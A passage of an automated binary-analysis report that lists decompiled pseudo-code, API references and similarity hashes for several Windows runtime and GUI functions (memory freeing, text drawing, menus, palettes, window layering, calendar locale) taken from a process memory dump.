0x2b8), _t211, _t223); if(( *(_v8 + 0x8c) & 0x00000004) != 0) { *(_v8 + 0x2b0) = MulDiv( *(_v8 + 0x2b0), _t211, *(_v8 + 0x2b8)); } if(( *(_v8 + 0x8c) & 0x00000008) != 0) { *(_v8 + 0x2b4) = MulDiv( *(_v8 + 0x2b4), _t211, *(_v8 + 0x2b8)); } if(( *(_v8 + 0x8c) & 0x00000020) != 0) { *(_v8 + 0x242) = MulDiv( *(_v8 + 0x242), _t211, *(_v8 + 0x2b8)); *(_v8 + 0x246) = MulDiv( *(_v8 + 0x246), _t211, *(_v8 + 0x2b8)); } } goto L14; } } 0x0044e9d8 0x0044e9d8 0x0044e9d9 0x0044e9db 0x0044e9de 0x0044e9e0 0x0044e9e6 0x0044e9ed 0x0044e9ee 0x0044e9f3 0x0044e9f6 0x0044e9fe 0x0044ea09 0x0044ea14 0x0044ea1a 0x0044ea26 0x0044ea2c 0x0044ea35 0x0044ea35 0x0044ea3a 0x0044ea3a 0x0044ea45 0x0044ea54 0x0044ebc9 0x0044ebcc 0x0044ebd2 0x0044ebd4 0x0044ebdb 0x0044ebdb 0x0044ebe3 0x0044ebe9 0x0044ebeb 0x0044ebf2 0x0044ebf2 0x0044ec01 0x0044ec07 0x0044ec09 0x0044ec18 0x0044ec2a 0x0044ec2a 0x0044ec3b 0x0044ec42 0x0044ec45 0x0044ec48 0x0044ec55 0x0044ea6a 0x0044ea74 0x0044ea7f 0x0044ea88 0x0044ea94 0x0044eab4 0x0044eab4 0x0044ea88 0x0044eab9 0x0044eac4 0x0044ead2 0x0044ead7 0x0044eadd 0x0044eadf 0x0044eae5 0x0044eaee 0x0044eb01 0x0044eb14 0x0044eb23 0x0044eb42 0x0044eb42 0x0044eb52 0x0044eb71 0x0044eb71 0x0044eb81 0x0044eba0 0x0044ebc3 0x0044ebc3 0x0044eb81 0x00000000 0x0044eadf

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 0044EAAB MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB3A MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB69 MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB98 MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EBBB

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 7c06df506918b2a8084eeb7c404449d434ecfeb24f2213037839e8fb0ff35c84 Instruction ID: 21f30903740b1ce47e0213c7038e8d86d6add3c7edb827e050f75d84db499a4c Opcode Fuzzy Hash: 7c06df506918b2a8084eeb7c404449d434ecfeb24f2213037839e8fb0ff35c84 Instruction Fuzzy Hash: 7081B574A00154EFDB40DB9AC589E9EB7F9BF49304F2541FAA808DB362CB74AE409B54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%

E00401B88(void* __eax, void* __edi) { signed int __ebx; void* _t50; signed int _t51; signed int _t52; signed int _t54; void _t57; int _t58; signed int _t65; void* _t67; signed int _t69; intOrPtr _t70; signed int _t75; signed int _t76; signed int _t77; void* _t79; void* _t82; void _t85; void* _t87; void* _t89; _t48 = __eax; _t77 = *(__eax - 4); _t65 = *0x46304d; // 0x0 if((_t77 & 0x00000007) != 0) { __eflags = _t77 & 0x00000005; if((_t77 & 0x00000005) != 0) { _pop(_t65); __eflags = _t77 & 0x00000003; if((_t77 & 0x00000003) != 0) { return 0xffffffff; } else { _push(_t65); _t67 = __eax - 0x10; E00401740(); _t50 = _t67; _t85 = *_t50; _t82 = *(_t50 + 4); _t51 = VirtualFree(_t67, 0, 0x8000); if(_t51 == 0) { _t52 = _t51 | 0xffffffff; __eflags = _t52; } else { *_t82 = _t85; *(_t85 + 4) = _t82; _t52 = 0; } *0x4657a8 = 0; return _t52; } } else { goto L21; } } else { __eflags = __bl; __ebx = *__edx; if(__eflags != 0) { while(1) { __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__eflags == 0) { goto L6; } Sleep(0); __edx = __edx; __ecx = __ecx; __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__eflags != 0) { Sleep(0xa); __edx = __edx; __ecx = __ecx; continue; } goto L6; } } L6: _t6 = __edx + 0xc; *_t6 = *(__edx + 0xc) - 1; __eflags = *_t6; __eax = *(__edx + 8); if( *_t6 == 0) { __eflags = __eax; if(__eax == 0) { L12: *(__ebx + 0xc) = __eax; } else { __eax = *(__edx + 0x14); __ecx = *(__edx + 4); *(__eax + 4) = __ecx; *(__ecx + 0x14) = __eax; __eax = 0; __eflags = *((intOrPtr*)(__ebx + 0x10)) - __edx; if( *((intOrPtr*)(__ebx + 0x10)) == __edx) { goto L12; } } *__ebx = __al; __eax = __edx; __edx = *(__edx - 4); __bl = *0x46304d; // 0x0 L21: __eflags = _t65; _t69 = _t77 & 0xfffffff0; _push(_t84); _t87 = _t48; if(__eflags != 0) { while(1) { _t54 = 0x100; asm("lock cmpxchg [0x463718], ah"); if(__eflags == 0) { goto L22; } Sleep(0); _t54 = 0x100; asm("lock cmpxchg [0x463718], ah"); if(__eflags != 0) { Sleep(0xa); continue; } goto L22; } } L22: __eflags = (_t87 - 4)[_t69] & 0x00000001; _t75 = (_t87 - 4)[_t69]; if(((_t87 - 4)[_t69] & 0x00000001) != 0) { _t54 = _t69 + _t87; _t76 = _t75 & 0xfffffff0; _t69 = _t69 + _t76; __eflags = _t76 - 0xb30; if(_t76 >= 0xb30) { _t54 = E004015BC(_t54); } } else { _t76 = _t75 | 0x00000008; __eflags = _t76; (_t87 - 4)[_t69] = _t76; } __eflags = *(_t87 - 4) & 0x00000008; if(( *(_t87 - 4) & 0x00000008) != 0) { _t76 = *(_t87 - 8); _t87 = _t87 - _t76; _t69 = _t69 + _t76; __eflags = _t76 - 0xb30; if(_t76 >= 0xb30) { _t54 = E004015BC(_t87); } } __eflags = _t69 - 0x13fff0; if(_t69 == 0x13fff0) { __eflags = *0x463720 - 0x13fff0; if( *0x463720 != 0x13fff0) { _t70 = _t87 + 0x13fff0; E0040165C(_t54); *((intOrPtr*)(_t70 - 4)) = 2; *0x463720 = 0x13fff0; *0x46371c = _t70; *0x463718 = 0; __eflags = 0; return 0; } else { _t89 = _t87 - 0x10; _t57 = *_t89; _t79 = *(_t89 + 4); *(_t57 + 4) = _t79; *_t79 = _t57; *0x463718 = 0; _t58 = VirtualFree(_t89, 0, 0x8000); __eflags = _t58 - 1; asm("sbb eax, eax"); return _t58; } } else { *(_t87 - 4) = _t69 + 3; *(_t87 - 8 + _t69) = _t69; E004015FC(_t87, _t76, _t69); *0x463718 = 0; __eflags = 0; return 0; } } else { __eflags = __eax; *(__edx + 8) = __ecx; *(__ecx - 4) = __eax; if(__eflags == 0) { __ecx = *(__ebx + 4); *(__edx + 0x14) = __ebx; *(__edx + 4) = __ecx; *(__ecx + 0x14) = __edx; *(__ebx + 4) = __edx; *__ebx = 0; __eax = 0; __eflags = 0; _pop(__ebx); return 0; } else { __eax = 0; __eflags = 0; *__ebx = __al; _pop(__ebx); return 0; } } } } 0x00401b88 0x00401b88 0x00401b91 0x00401b97 0x00401c68 0x00401c6b 0x00401d58 0x00401d59 0x00401d5c 0x00401d67 0x004017e4 0x004017e4 0x004017e9 0x004017ec 0x004017f1 0x004017f3 0x004017f5 0x00401800 0x00401807 0x00401812 0x00401812 0x00401809 0x00401809 0x0040180b 0x0040180e 0x0040180e 0x00401815 0x0040181f 0x0040181f 0x00000000 0x00000000 0x00000000 0x00401b9d 0x00401b9d 0x00401b9f 0x00401ba1 0x00401c04 0x00401c04 0x00401c09 0x00401c0d 0x00000000 0x00000000 0x00401c13 0x00401c18 0x00401c19 0x00401c1a 0x00401c1f 0x00401c23 0x00401c2d 0x00401c32 0x00401c33 0x00000000 0x00401c33 0x00000000 0x00401c23 0x00401c04 0x00401ba3 0x00401ba3 0x00401ba3 0x00401ba3 0x00401ba7 0x00401baa 0x00401bd8 0x00401bda 0x00401bef 0x00401bef 0x00401bdc 0x00401bdc 0x00401bdf 0x00401be2 0x00401be5 0x00401be8 0x00401bea 0x00401bed 0x00000000 0x00000000 0x00401bed 0x00401bf2 0x00401bf4 0x00401bf6 0x00401bf9 0x00401c71 0x00401c74 0x00401c76 0x00401c78 0x00401c79 0x00401c7b 0x00401c38 0x00401c38 0x00401c3d 0x00401c45 0x00000000 0x00000000 0x00401c49 0x00401c4e 0x00401c53 0x00401c5b 0x00401c5f 0x00000000 0x00401c5f 0x00000000 0x00401c5b 0x00401c38 0x00401c7d 0x00401c7d 0x00401c85 0x00401c89 0x00401cc0 0x00401cc3 0x00401cc6 0x00401cc8 0x00401cce 0x00401cd0 0x00401cd0 0x00401c8b 0x00401c8b 0x00401c8b 0x00401c8e 0x00401c8e 0x00401c92 0x00401c96 0x00401cd8 0x00401cdb 0x00401cdd 0x00401cdf 0x00401ce5 0x00401ce9 0x00401ce9 0x00401ce5 0x00401c98 0x00401c9e 0x00401cf0 0x00401cfa 0x00401d28 0x00401d2e 0x00401d33 0x00401d3a 0x00401d44 0x00401d4a 0x00401d51 0x00401d55 0x00401cfc 0x00401cfc 0x00401cff 0x00401d01 0x00401d04 0x00401d07 0x00401d09 0x00401d18 0x00401d1d 0x00401d20 0x00401d24 0x00401d24 0x00401ca0 0x00401ca3 0x00401ca6 0x00401cae 0x00401cb3 0x00401cba 0x00401cbe 0x00401cbe 0x00401bac 0x00401bac 0x00401bae 0x00401bb4 0x00401bb7 0x00401bc0 0x00401bc3 0x00401bc6 0x00401bc9 0x00401bcc 0x00401bcf 0x00401bd2 0x00401bd2 0x00401bd4 0x00401bd5 0x00401bb9 0x00401bb9 0x00401bb9 0x00401bbb 0x00401bbd 0x00401bbe 0x00401bbe 0x00401bb7 0x00401baa

APIs

Sleep.KERNEL32(00000000,?,?,00000000,004020E0), ref: 00401C13 Sleep.KERNEL32(0000000A,00000000,?,?,00000000,004020E0), ref: 00401C2D

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep String ID: API String ID: 3472027048-0 Opcode ID: 1e7206aa02f44caa39bbd2ffb76f0b3617e92c3f79faf1de15c14edde19f57f3 Instruction ID: 15b0095f43085506295c4366a214112c8c682c56cb7411fb19f3a5050c217c1f Opcode Fuzzy Hash: 1e7206aa02f44caa39bbd2ffb76f0b3617e92c3f79faf1de15c14edde19f57f3 Instruction Fuzzy Hash: E151F3B12043809FE715CF28C984716BBD0AF45315F2881BFE444AB3E2E7B8D945C79A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%

E004303E4(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) { int _v8; intOrPtr _v12; intOrPtr _v16; struct tagRECT _v32; void* _t53; CHAR* _t63; void* _t74; void* _t76; CHAR* _t87; int _t113; intOrPtr _t123; void* _t135; int _t136; int _t137; int _t139; int* _t140; void* _t144; char _t153; _t116 = __ecx; _t143 = _t144; _v8 = 0; _v16 = __ecx; _v12 = __edx; _t135 = __eax; _t113 = _a4; _push(_t144); _push(0x4305d0); _push( *[fs:eax]); *[fs:eax] = _t144 + 0xffffffe4; _t53 = E00432460(__eax); _t131 = _t53; if(_t53 != 0 && E00433CE0(_t131) != 0) { if((_t113 & 0x00000000) != 0) { __eflags = (_t113 & 0x00000002) - 2; if((_t113 & 0x00000002) == 2) { _t113 = _t113 & 0xfffffffd; __eflags = _t113; } } else { _t113 = _t113 & 0xffffffff | 0x00000002; } _t113 = _t113 | 0x00020000; } E004047D4( &_v8, _v16); if((_t113 & 0x00000004) == 0) { L12: E00404B4C(_v8, 0x4305f4); if(_t153 != 0) { E004262A4( *((intOrPtr*)(_v12 + 0x14)), _t116, 1, _t131, _t143, __eflags); __eflags = *((char*)(_t135 + 0x3a)); if( *((char*)(_t135 + 0x3a)) != 0) { _t132 = *((intOrPtr*)(_v12 + 0xc)); __eflags = E00425C4C( *((intOrPtr*)(_v12 + 0xc))) | *0x4305f8; E00425C58( *((intOrPtr*)(_v12 + 0xc)), E00425C4C( *((intOrPtr*)(_v12 + 0xc))) | *0x4305f8, _t132, _t135, _t143); } __eflags = *((char*)(_t135 + 0x39)); if( *((char*)(_t135 + 0x39)) != 0) { L26: _t136 = _v8; __eflags = _t136; if(_t136 != 0) { _t137 = _t136 - 4; __eflags = _t137; _t136 = *_t137; } _t63 = E00404C00(_v8); DrawTextA(E0042681C(_v12), _t63, _t136, _a12, _t113); L29: _pop(_t123); *[fs:eax] = _t123; _push(0x4305d7); return E0040473C( &_v8); } else { __eflags = _a8; if(_a8 == 0) { OffsetRect(_a12, 1, 1); E004258CC( *((intOrPtr*)(_v12 + 0xc)), 0xff000014); _t139 = _v8; __eflags = _t139; if(_t139 != 0) { _t140 = _t139 - 4; __eflags = _t140; _t139 = *_t140; } _t87 = E00404C00(_v8); DrawTextA(E0042681C(_v12), _t87, _t139, _a12, _t113); OffsetRect(_a12, 0xffffffff, 0xffffffff); } __eflags = _a8; if(_a8 == 0) { L25: E004258CC( *((intOrPtr*)(_v12 + 0xc)), 0xff000010); } else { _t74 = E00425400(0xff00000d); _t76 = E00425400(0xff000010); __eflags = _t74 - _t76; if(_t74 != _t76) { goto L25; } E004258CC( *((intOrPtr*)(_v12 + 0xc)), 0xff000014); } goto L26; } } if((_t113 & 0x00000004) == 0) { asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _v32.top = _v32.top + 4; DrawEdge(E0042681C(_v12), &_v32, 6, "true"); } goto L29; } else { if(_v8 == 0) { L11: E00404A08( &_v8, 0x4305e8); goto L12; } if( *_v8 != 0x26) { goto L12; } _t153 = *((char*)(_v8 + 1)); if(_t153 != 0) { goto L12; } goto L11; } } 0x004303e4 0x004303e5 0x004303ef 0x004303f2 0x004303f5 0x004303f8 0x004303fa 0x004303ff 0x00430400 0x00430405 0x00430408 0x0043040d 0x00430412 0x00430416 0x00430426 0x00430435 0x00430438 0x0043043d 0x0043043d 0x0043043d 0x00430428 0x0043042b 0x0043042b 0x00430440 0x00430440 0x0043044c 0x00430454 0x0043047a 0x00430482 0x00430487 0x004304c5 0x004304ca 0x004304ce 0x004304d3 0x004304df 0x004304e7 0x004304e7 0x004304ec 0x004304f0 0x00430591 0x00430591 0x00430594 0x00430596 0x00430598 0x00430598 0x0043059b 0x0043059b 0x004305a6 0x004305b5 0x004305ba 0x004305bc 0x004305bf 0x004305c2 0x004305cf 0x004304f6 0x004304f6 0x004304fa 0x00430504 0x00430514 0x00430519 0x0043051c 0x0043051e 0x00430520 0x00430520 0x00430523 0x00430523 0x0043052e 0x0043053d 0x0043054a 0x0043054a 0x0043054f 0x00430553 0x00430581 0x0043058c 0x00430555 0x0043055a 0x00430566 0x0043056b 0x0043056d 0x00000000 0x00000000 0x0043057a 0x0043057a 0x00000000 0x00430553 0x004304f0 0x0043048c 0x0043049a 0x0043049b 0x0043049c 0x0043049d 0x0043049e 0x004304b3 0x004304b3 0x00000000 0x00430456 0x0043045a 0x0043046d 0x00430475 0x00000000 0x00430475 0x00430462 0x00000000 0x00000000 0x00430467 0x0043046b 0x00000000 0x00000000 0x00000000 0x0043046b

APIs

DrawEdge.USER32(00000000,?,00000006,?), ref: 004304B3 OffsetRect.USER32(?,00000001,00000001), ref: 00430504 DrawTextA.USER32(00000000,00000000,?,?,?), ref: 0043053D OffsetRect.USER32(?,000000FF,000000FF), ref: 0043054A DrawTextA.USER32(00000000,00000000,?,?,?), ref: 004305B5

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Draw$OffsetRectText$Edge String ID: API String ID: 3610532707-0 Opcode ID: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54 Instruction ID: 3dcdb83b52eea41a6f7c2ae4f71efb06fc793ff540cda049268810552e419287 Opcode Fuzzy Hash: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54 Instruction Fuzzy Hash: E451B770A00214AFDB10EB69C891B9FB7A5AF08324F55526BF914A7392C77CEE408B59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00430224(int __eax, void* __edx) { void* __edi; void* __esi; signed int _t39; signed int _t40; intOrPtr _t44; int _t45; void* _t47; int _t48; intOrPtr* _t49; _t18 = __eax; _t49 = __eax; if(( *(__eax + 0x1c) & 0x00000008) == 0) { if(( *(__eax + 0x1c) & 0x00000002) != 0) { *((char*)(__eax + 0x74)) = 1; return __eax; } _t19 = *((intOrPtr*)(__eax + 0x6c)); if( *((intOrPtr*)(__eax + 0x6c)) != 0) { return E00430224(_t19, __edx); } _t18 = GetMenuItemCount(E00430354(__eax, _t45, _t47)); _t48 = _t18; _t40 = _t39 & 0xffffff00 | _t48 == 0x00000000; while(_t48 > 0) { _t45 = _t48 - 1; _t18 = GetMenuState(E00430354(_t49, _t45, _t48), _t45, 0x400); if((_t18 & 0x00000004) == 0) { _t18 = RemoveMenu(E00430354(_t49, _t45, _t48), _t45, 0x400); _t40 = 1; } _t48 = _t48 - 1; } if(_t40 != 0) { if( *((intOrPtr*)(_t49 + 0x64)) != 0) { L14: E004300E4(_t49, _t45, _t48); L15: return *((intOrPtr*)( *_t49 + 0x3c))(); } _t44 = *0x42eccc; // 0x42ed18 if(E00403AB4( *((intOrPtr*)(_t49 + 0x70)), _t44) == 0 || GetMenuItemCount(E00430354(_t49, _t45, _t48)) != 0) { goto L14; } else { DestroyMenu( *(_t49 + 0x34)); *(_t49 + 0x34) = 0; goto L15; } } } return _t18; } 0x00430224 0x00430228 0x0043022e 0x00430238 0x0043023a 0x00000000 0x0043023a 0x00430243 0x00430248 0x00000000 0x0043024a 0x0043025c 0x00430261 0x00430265 0x0043026a 0x00430273 0x0043027d 0x00430284 0x00430294 0x00430299 0x00430299 0x0043029b 0x0043029c 0x004302a2 0x004302a8 0x004302dd 0x004302df 0x004302e4 0x00000000 0x004302ea 0x004302ad 0x004302ba 0x00000000 0x004302cd 0x004302d1 0x004302d8 0x00000000 0x004302d8 0x004302ba 0x004302a2 0x004302f1

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8 Instruction ID: a3695b4b82a7dda22394f8c72c2d1be36efbcd0d540cfdc55166254eebed839c Opcode Fuzzy Hash: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8 Instruction Fuzzy Hash: E511A521B002495ADB20AA7B8929B5B27885F4970CF0422ABBD11A7393CA3CCC09C75C

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E004297F8(int __eax) { int _t21; signed int _t29; char _t34; int _t42; int _t43; struct HDC__* _t44; intOrPtr _t45; _t21 = __eax; _t42 = __eax; _t45 = *((intOrPtr*)(__eax + 0x28)); if( *((char*)(__eax + 0x30)) == 0 && *(_t45 + 0x10) == 0 && *((intOrPtr*)(_t45 + 0x14)) != 0) { _t22 = *((intOrPtr*)(_t45 + 0x14)); if( *((intOrPtr*)(_t45 + 0x14)) == *((intOrPtr*)(_t45 + 8))) { E0042824C(_t22); } _t21 = E0042730C( *((intOrPtr*)(_t45 + 0x14)), 1 << ( *(_t45 + 0x3e) & 0x0000ffff)); _t43 = _t21; *(_t45 + 0x10) = _t43; if(_t43 == 0) { _t44 = E00426C14(GetDC(0)); if( *((char*)(_t45 + 0x71)) != 0) { L9: _t34 = 1; } else { _t29 = GetDeviceCaps(_t44, 0xc); if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) { goto L9; } else { _t34 = 0; } } *((char*)(_t45 + 0x71)) = _t34; if(_t34 != 0) { *(_t45 + 0x10) = CreateHalftonePalette(_t44); } _t21 = ReleaseDC(0, _t44); if( *(_t45 + 0x10) == 0) { *((char*)(_t42 + 0x30)) = 1; return _t21; } } } return _t21; } 0x004297f8 0x004297fc 0x004297fe 0x00429805 0x0042981f 0x00429825 0x00429827 0x00429827 0x0042983e 0x00429843 0x00429845 0x0042984a 0x00429858 0x0042985e 0x00429887 0x00429887 0x00429860 0x00429863 0x00429881 0x00000000 0x00429883 0x00429883 0x00429883 0x00429881 0x00429889 0x0042988e 0x00429896 0x00429896 0x0042989c 0x004298a5 0x004298a7 0x00000000 0x004298a7 0x004298a5 0x0042984a 0x004298af

APIs

GetDC.USER32(00000000), ref: 0042984E GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863 GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891 ReleaseDC.USER32 ref: 0042989C

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease String ID: API String ID: 2404249990-0 Opcode ID: 3865229444c542543eb940fc4c11deb8b2b846e1a53becbdafc0675224900ef4 Instruction ID: ad4f96e05be2536000db3a933fed08fd47ceb8b130526fe63b94d72f1acf08c5 Opcode Fuzzy Hash: 3865229444c542543eb940fc4c11deb8b2b846e1a53becbdafc0675224900ef4 Instruction Fuzzy Hash: DD11B4217152B99AEB24FF25A8817EE36D0AF42355F48012BFC406B2C1D7B98C94C2B9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%

E00453CD8(void* __eax) { void* _t16; void* _t38; signed int _t40; _t16 = __eax; _t38 = __eax; if(( *(__eax + 0x1c) & 0x00000010) == 0 && *0x4626bc != 0) { _t16 = E004426F4(__eax); if(_t16 != 0) { _t40 = GetWindowLongA(E004423F8(_t38), 0xffffffec); if( *(_t38 + 0x328) != 0 || *(_t38 + 0x350) != 0) { if((_t40 & 0x00080000) == 0) { SetWindowLongA(E004423F8(_t38), 0xffffffec, _t40 | 0x00080000); } return *0x4626bc(E004423F8(_t38), *((intOrPtr*)(_t38 + 0x354)), *(_t38 + 0x329) & 0x000000ff, *(0x46274c + ( *(_t38 + 0x328) & 0x000000ff) * 4) | *(0x462754 + ( *(_t38 + 0x350) & 0x000000ff) * 4)); } else { SetWindowLongA(E004423F8(_t38), 0xffffffec, _t40 & 0xfff7ffff); return RedrawWindow(E004423F8(_t38), 0, 0, 0x485); } } } return _t16; } 0x00453cd8 0x00453cda 0x00453ce0 0x00453cf5 0x00453cfc 0x00453d11 0x00453d1a 0x00453d2b 0x00453d3e 0x00453d3e 0x00000000 0x00453d7f 0x00453d90 0x00000000 0x00453da6 0x00453d1a 0x00453cfc 0x00453dad

APIs

GetWindowLongA.USER32 ref: 00453D0C SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00453D3E SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0045143C), ref: 00453D77 SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00453D90 RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0045143C), ref: 00453DA6

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayeredRedraw String ID: API String ID: 1758778077-0 Opcode ID: a167b8226a367de4a078897bccef434779ea8f70462ce2f86b559be6c3f23891 Instruction ID: 2f97fc831ddea0b8c0e421ebb8e19b8b50e61007e8c28567c32a4e0cf3139f72 Opcode Fuzzy Hash: a167b8226a367de4a078897bccef434779ea8f70462ce2f86b559be6c3f23891 Instruction Fuzzy Hash: 06110160A047902BDB11AF794D85F5626BC1B0536BF0805BABC55EA2C3CAACCA0CC768

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%

E00427274(void* __eax) { signed int _v5; struct HDC__* _v12; struct HPALETTE__* _t21; struct HPALETTE__* _t25; void* _t28; intOrPtr _t35; void* _t37; void* _t39; intOrPtr _t40; _t37 = _t39; _t40 = _t39 + 0xfffffff8; _t28 = __eax; _v5 = 0; if( *0x46634c == 0) { return _v5 & 0x000000ff; } else { _v12 = GetDC(0); _push(_t37); _push(0x4272fa); _push( *[fs:edx]); *[fs:edx] = _t40; if(GetDeviceCaps(_v12, 0x68) >= 0x10) { _t21 = *0x46634c; // 0x65080609 GetPaletteEntries(_t21, 0, 8, _t28 + 4); _t25 = *0x46634c; // 0x65080609 GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c); _v5 = 1; } _pop(_t35); *[fs:eax] = _t35; _push(0x427301); return ReleaseDC(0, _v12); } } 0x00427275 0x00427277 0x0042727b 0x0042727d 0x00427288 0x00427309 0x0042728a 0x00427291 0x00427296 0x00427297 0x0042729c 0x0042729f 0x004272b0 0x004272ba 0x004272c0 0x004272d2 0x004272d8 0x004272dd 0x004272dd 0x004272e3 0x004272e6 0x004272e9 0x004272f9 0x004272f9

APIs

GetDC.USER32(00000000), ref: 0042728C GetDeviceCaps.GDI32(?,00000068), ref: 004272A8 GetPaletteEntries.GDI32(65080609,00000000,00000008,?), ref: 004272C0 GetPaletteEntries.GDI32(65080609,00000008,00000008,?), ref: 004272D8 ReleaseDC.USER32 ref: 004272F4

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: EntriesPalette$CapsDeviceRelease String ID: API String ID: 3128150645-0 Opcode ID: ac1bfe70cc136cd0b1c148b7d32caf684ac8a85d6e8810b4e931f31978cb02c9 Instruction ID: fcbf177f7b8efaa1d200cff961121ff1be4b86295971eaf25a38603dbf7197bd Opcode Fuzzy Hash: ac1bfe70cc136cd0b1c148b7d32caf684ac8a85d6e8810b4e931f31978cb02c9 Instruction Fuzzy Hash: C1112B3164C304BEFB04DBE59C42F6D77E8E705704F41C0AAFA44EA2C1DABA9444C729

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 64%

E0040BBE0(void* __esi, void* __eflags) { char _v8; intOrPtr* _t18; intOrPtr _t26; void* _t27; long _t29; intOrPtr _t32; void* _t33; _t33 = __eflags; _push(0); _push(_t32); _push(0x40bc77); _push( *[fs:eax]); *[fs:eax] = _t32; E0040B954(GetThreadLocale(), 0x40bc8c, 0x100b, &_v8); _t29 = E00408B44(0x40bc8c, 1, _t33); if(_t29 + 0xfffffffd - 3 < 0) { EnumCalendarInfoA(E0040BB2C, GetThreadLocale(), _t29, 4); _t27 = 7; _t18 = 0x4658f4; do { *_t18 = 0xffffffff; _t18 = _t18 + 4; _t27 = _t27 - 1; } while (_t27 != 0); EnumCalendarInfoA(E0040BB68, GetThreadLocale(), _t29, 3); } _pop(_t26); *[fs:eax] = _t26; _push(E0040BC7E); return E0040473C( &_v8); } 0x0040bbe0 0x0040bbe3 0x0040bbe8 0x0040bbe9 0x0040bbee 0x0040bbf1 0x0040bc07 0x0040bc19 0x0040bc23 0x0040bc33 0x0040bc38 0x0040bc3d 0x0040bc42 0x0040bc42 0x0040bc48 0x0040bc4b 0x0040bc4b 0x0040bc5c 0x0040bc5c 0x0040bc63 0x0040bc66 0x0040bc69 0x0040bc76

APIs

